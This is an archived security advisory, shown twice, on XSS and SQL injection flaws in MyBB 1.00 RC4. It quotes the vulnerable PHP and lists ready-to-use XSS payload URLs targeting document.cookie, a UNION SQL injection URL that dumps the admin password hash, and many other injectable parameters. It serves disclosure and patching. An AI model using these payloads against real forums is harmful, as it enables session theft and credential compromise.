<<< Date Index >>>     <<< Thread Index >>>

Multiple vulnerabilities in MyBulletinBoard (MyBB) 1.00 RC4



**********************************************************************
* CODEBUG Labs
* Advisory #7
* Title: Multiple vulnerabilities in MyBulletinBoard (MyBB) 1.00 RC4
* Author: Alberto Trivero
* English Version: Alberto Trivero
* Product: MyBulletinBoard 1.00 RC4
* Type: Multiple Vulnerabilities
* Web: http://www.codebug.org/
**********************************************************************


--) Software Page (www.mybboard.com)

"MyBB is a powerful, efficient and free forum package developed in PHP and
MySQL. MyBB has been designed with the end users in mind, you and your
subscribers. Full control over your discussion system is presented right at
the tip of your fingers, from multiple styles and themes to the ultimate
customisation of your forums using the template system."


--) Cross-Site Scripting (XSS)

Let's look at code from misc.php at line 310:

    <?
    ...
    $url = $settings['bburl']."/rss.php";
    if(!$all)
    {
      $url .= "?fid=$syndicate";
      $add = 1;
    }
    if($version != "rss")
    {
      if(!$add)
      {
        $url .= "?";
      }
      else
      {
        $url .= "&";
      }
      $url .= "type=$version";
      $add = 1;
    }
    if($limit)
    {
      if($limit > 100)
      {
        $limit = 100;
      }
      if(!$add)
      {
        $url .= "?";
      }
      else
      {
        $url .= "&";
      }
      $url .= "limit=$limit";
    }
    ...
    ?>

This piece of code has the task of complete the $url variable that will
print as is in the result page. All the variables that compose the URL
($syndicate (note line 305: $syndicate.= $comma.$fid), $version, $limit) can
be controlled by a remote user and when MyBB take the value doesn't sanitise
properly it. So it's possible to perform a Cross-Site Scripting attack by
sending some requests like these (one for every variable):


http://www.example.com/mybb/misc.php?action=syndication&forums[0]=%3Cscript%
3Ealert(document.cookie)%3C/script%3E

http://www.example.com/mybb/misc.php?action=syndication&forums[0]=0&version=
%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www.example.com/mybb/misc.php?action=syndication&limit=%22%3E%3Cscrip
t%3Ealert(document.cookie)%3C/script%3E

Unfortunately for this board, there are many others parameters that doesn't
check properly if someone inject some HTML maliciuos code, or other:


http://www.example.com/mybb/forumdisplay.php?fid=1&datecut=%22%3E%3Cscript%3
Ealert(document.cookie)%3C/script%3E

http://www.example.com/mybb/forumdisplay.php?fid=2&page=%22%3E%3Cscript%3Eal
ert(document.cookie)%3C/script%3E

http://www.example.com/mybb/member.php?agree=I+Agree&username=%22%3Cscript%3
Ealert(document.cookie)%3C/script%3E

http://www.example.com/mybb/member.php?agree=I+Agree&email=%22%3Cscript%3Eal
ert(document.cookie)%3C/script%3E

http://www.example.com/mybb/member.php?agree=I+Agree&email2=%22%3Cscript%3Ea
lert(document.cookie)%3C/script%3E

http://www.example.com/mybb/memberlist.php?page=%22%3E%3Cscript%3Ealert(docu
ment.cookie)%3C/script%3E

http://www.example.com/mybb/memberlist.php?usersearch=%22%3E%3Cscript%3Ealer
t(document.cookie)%3C/script%3E

http://www.example.com/mybb/showthread.php?mode=linear&tid=1&pid=%22%3E%3Csc
ript%3Ealert(document.cookie)%3C/script%3E

http://www.example.com/mybb/showthread.php?mode=linear&tid=1%22%3E%3Cscript%
3Ealert(document.cookie)%3C/script%3E

http://www.example.com/mybb/printthread.php?tid=1%3Cscript%3Ealert(document.
cookie)%3C/script%3E


--) SQL Injection

Let's look at code from calendar.php at line 54:

    <?
    ...
    if($action == "event")
    {
      $query = $db->query("SELECT e.*, u.username, g.namestyle FROM
".TABLE_PREFIX."events e LEFT JOIN ".TABLE_PREFIX."users u ON
(e.author=u.uid) LEFT JOIN ".TABLE_PREFIX."usergroups g ON
(u.usergroup=g.gid) WHERE e.eid='$eid'");
    ...
    ?>

What we are seeing is a query to the SQL DB for create the result page with
the correct data from the calendar. The problem occurs becouse the $eid
parameter in the WHERE clause is put in the SQL query with any sanitisation
before, so a malicious user will be able to do an SQL injecion attack to the
database for obtain what he want.
This is a proof of concept exploit that it's able to show the MD5 hash of
the password of the board's administrator:


http://www.example.com/mybb/calendar.php?action=event&eid='%20UNION%20SELECT
%20uid,uid,null,null,null,null,password,null%20FROM%20mybb_users/*

Unfortunately (or fortunately, by the point of view) this PoC doesn't work
on all the versions and configurations of MySQL Database.
For automate the explotation process I've made with FAiN182 a Perl exploit
here available: http://albythebest.altervista.org/mybb.pl
As for the XSS attack before, also for the SQL injection attack, there are
many vulnerables parameters. These are the most important:

    http://www.example.com/mybb/online.php?pidsql=)[sql_query]
    http://www.example.com/mybb/memberlist.php?usersearch=%'[sql_query]
    http://www.example.com/mybb/editpost.php?pid='[sql_query]
    http://www.example.com/mybb/forumdisplay.php?fid='[sql_query]
    http://www.example.com/mybb/newreply.php?tid='[sql_query]
    http://www.example.com/mybb/search.php?action=results&sid='[sql_query]
    http://www.example.com/mybb/showthread.php?tid='[sql_query]
    http://www.example.com/mybb/showthread.php?pid='[sql_query]
    http://www.example.com/mybb/usercp2.php?tid='[sql_query]
    http://www.example.com/mybb/printthread.php?tid='[sql_query]
    http://www.example.com/mybb/reputation.php?pid='[sql_query]

http://www.example.com/mybb/portal.php?action=do_login&username='[sql_query]
    http://www.example.com/mybb/polls.php?action=newpoll&tid='[sql_query]
    http://www.example.com/mybb/ratethread.php?tid='[sql_query]


--) Patch

Thanks to Chris Boulton, main developer on MyBB, for the release of the
patchs, availables at this address:
http://www.mybboard.com/community/showthread.php?tid=2559


**********************************************************************
*        http://www.codebug.org/
**********************************************************************
**********************************************************************
* CODEBUG Labs
* Advisory #7
* Title: Multiple vulnerabilities in MyBulletinBoard (MyBB) 1.00 RC4
* Author: Alberto Trivero
* English Version: Alberto Trivero
* Product: MyBulletinBoard 1.00 RC4
* Type: Multiple Vulnerabilities
* Web: http://www.codebug.org/
**********************************************************************


--) Software Page (www.mybboard.com)

"MyBB is a powerful, efficient and free forum package developed in PHP and 
MySQL. MyBB has
been designed with the end users in mind, you and your subscribers. Full 
control over your
discussion system is presented right at the tip of your fingers, from multiple 
styles and
themes to the ultimate customisation of your forums using the template system."


--) Cross-Site Scripting (XSS)

Let's look at code from misc.php at line 310:

    <?
    ...
    $url = $settings['bburl']."/rss.php";
    if(!$all)
    {
      $url .= "?fid=$syndicate";
      $add = 1;
    }
    if($version != "rss")
    {
      if(!$add)
      {
        $url .= "?";
      }
      else
      {
        $url .= "&";
      }
      $url .= "type=$version";
      $add = 1;
    }
    if($limit)
    {
      if($limit > 100)
      {
        $limit = 100;
      }
      if(!$add)
      {
        $url .= "?";
      }
      else
      {
        $url .= "&";
      }
      $url .= "limit=$limit";
    }
    ...
    ?>

This piece of code has the task of complete the $url variable that will print 
as is in the
result page. All the variables that compose the URL ($syndicate (note line 305: 
$syndicate
.= $comma.$fid), $version, $limit) can be controlled by a remote user and when 
MyBB take
the value doesn't sanitise properly it. So it's possible to perform a 
Cross-Site Scripting
attack by sending some requests like these (one for every variable):

    
http://www.example.com/mybb/misc.php?action=syndication&forums[0]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
    
http://www.example.com/mybb/misc.php?action=syndication&forums[0]=0&version=%3Cscript%3Ealert(document.cookie)%3C/script%3E
    
http://www.example.com/mybb/misc.php?action=syndication&limit=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Unfortunately for this board, there are many others parameters that doesn't 
check properly
if someone inject some HTML maliciuos code, or other:

    
http://www.example.com/mybb/forumdisplay.php?fid=1&datecut=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    
http://www.example.com/mybb/forumdisplay.php?fid=2&page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    
http://www.example.com/mybb/member.php?agree=I+Agree&username=%22%3Cscript%3Ealert(document.cookie)%3C/script%3E
    
http://www.example.com/mybb/member.php?agree=I+Agree&email=%22%3Cscript%3Ealert(document.cookie)%3C/script%3E
    
http://www.example.com/mybb/member.php?agree=I+Agree&email2=%22%3Cscript%3Ealert(document.cookie)%3C/script%3E
    
http://www.example.com/mybb/memberlist.php?page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    
http://www.example.com/mybb/memberlist.php?usersearch=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    
http://www.example.com/mybb/showthread.php?mode=linear&tid=1&pid=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    
http://www.example.com/mybb/showthread.php?mode=linear&tid=1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    
http://www.example.com/mybb/printthread.php?tid=1%3Cscript%3Ealert(document.cookie)%3C/script%3E


--) SQL Injection

Let's look at code from calendar.php at line 54:

    <?
    ...
    if($action == "event")
    {
      $query = $db->query("SELECT e.*, u.username, g.namestyle FROM 
".TABLE_PREFIX."events e LEFT JOIN ".TABLE_PREFIX."users u ON (e.author=u.uid) 
LEFT JOIN ".TABLE_PREFIX."usergroups g ON (u.usergroup=g.gid) WHERE 
e.eid='$eid'");
    ...
    ?>

What we are seeing is a query to the SQL DB for create the result page with the 
correct
data from the calendar. The problem occurs becouse the $eid parameter in the 
WHERE clause
is put in the SQL query with any sanitisation before, so a malicious user will 
be able to
do an SQL injecion attack to the database for obtain what he want.
This is a proof of concept exploit that it's able to show the MD5 hash of the 
password of
the board's administrator:

    
http://www.example.com/mybb/calendar.php?action=event&eid='%20UNION%20SELECT%20uid,uid,null,null,null,null,password,null%20FROM%20mybb_users/*

Unfortunately (or fortunately, by the point of view) this PoC doesn't work on 
all the
versions and configurations of MySQL Database.
For automate the explotation process I've made with FAiN182 a Perl exploit here
available: 
As for the XSS attack before, also for the SQL injection attack, there are many 
vulnerables parameters. These are the most important:

    http://www.example.com/mybb/online.php?pidsql=)[sql_query]
    http://www.example.com/mybb/memberlist.php?usersearch=%'[sql_query]
    http://www.example.com/mybb/editpost.php?pid='[sql_query]
    http://www.example.com/mybb/forumdisplay.php?fid='[sql_query]
    http://www.example.com/mybb/newreply.php?tid='[sql_query]
    http://www.example.com/mybb/search.php?action=results&sid='[sql_query]
    http://www.example.com/mybb/showthread.php?tid='[sql_query]
    http://www.example.com/mybb/showthread.php?pid='[sql_query]
    http://www.example.com/mybb/usercp2.php?tid='[sql_query]
    http://www.example.com/mybb/printthread.php?tid='[sql_query]
    http://www.example.com/mybb/reputation.php?pid='[sql_query]
    http://www.example.com/mybb/portal.php?action=do_login&username='[sql_query]
    http://www.example.com/mybb/polls.php?action=newpoll&tid='[sql_query]
    http://www.example.com/mybb/ratethread.php?tid='[sql_query]


--) Patch

Thanks to Chris Boulton, main developer on MyBB, for the release of the patchs,
availables at this address: 
http://www.mybboard.com/community/showthread.php?tid=2559


**********************************************************************
*        http://www.codebug.org/
**********************************************************************